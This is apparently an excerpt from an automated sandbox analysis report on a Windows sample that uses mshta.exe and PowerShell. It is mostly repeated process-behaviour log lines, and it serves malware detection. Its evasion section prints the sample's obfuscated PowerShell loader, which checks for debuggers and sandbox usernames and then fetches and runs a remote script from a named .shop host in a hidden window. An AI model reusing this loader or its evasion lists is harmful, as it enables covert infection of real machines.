              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_069488DA push 7C069271h; retf 4_2_069488E5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003AF1F0 push eax; mov dword ptr [esp], 727D7C0Fh10_2_003AF1F2
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^QIEX-QZZD%B(_DYT~PDTXBK3F.JQ86R1ZW(PE5IEJN@OUOSH1@NC/A-;GAXYC/M75H"SV)VUU91}C#2H\KQ;J4LFM0WRYK:GO\/L*{IX37351521863506478298354615FUNCTION CHECKPROCESS ($A){IF (GWMI WIN32_PROCESS | WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -WINDOWSTYLE HIDDEN -ARGUMENTLIST '-W','HIDDEN','-EP','BYPASS','-NOP','-COMMAND','GDR -*;SET-VARIABLE CIU (.$EXECUTIONCONTEXT.(($EXECUTIONCONTEXT|MEMBER)[6].NAME).(($EXECUTIONCONTEXT.(($EXECUTIONCONTEXT|MEMBER)[6].NAME)|MEMBER|WHERE-OBJECT{$_.NAME-LIKE''*T*OM*D''}).NAME).INVOKE($EXECUTIONCONTEXT.(($EXECUTIONCONTEXT|MEMBER)[6].NAME).(($EXECUTIONCONTEXT.(($EXECUTIONCONTEXT|MEMBER)[6].NAME).PSOBJECT.METHODS|WHERE-OBJECT{$_.NAME-LIKE''*OM*E''}).NAME).INVOKE(''N*-O*'',$TRUE,$TRUE),[MANAGEMENT.AUTOMATION.COMMANDTYPES]::CMDLET)NET.WEBCLIENT);SET-ITEM VARIABLE:/LW ''HTTPS://DEDUHKO.KLIPZYROLOO.SHOP/MAZKK.EML'';[SCRIPTBLOCK]::CREATE((GI VARIABLE:CIU).VALUE.((((GI VARIABLE:CIU).VALUE|MEMBER)|WHERE-OBJECT{$_.NAME-LIKE''*NL*G''}).NAME).INVOKE((VARIABLE LW).VALUE)).INVOKERETURNASIS()';$XVHU = $ENV:APPDATA;FUNCTION RGRUS($KTGA, $XIIU){[IO.FILE]::WRITEALLBYTES($XIIU, (NEW-OBJECT (CQTEX $IONU.SUBSTRING(103,26))).DOWNLOADDATA($KTGA))};FUNCTION CQTEX($JWDQL){RETURN (($JWDQL -SPLIT '(?<=\G..)'|%{$IONU.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION JWDQL(){FUNCTION WEQQ($OXSST){IF(!(TEST-PATH -PATH $XIIU)){RGRUS (CQTEX 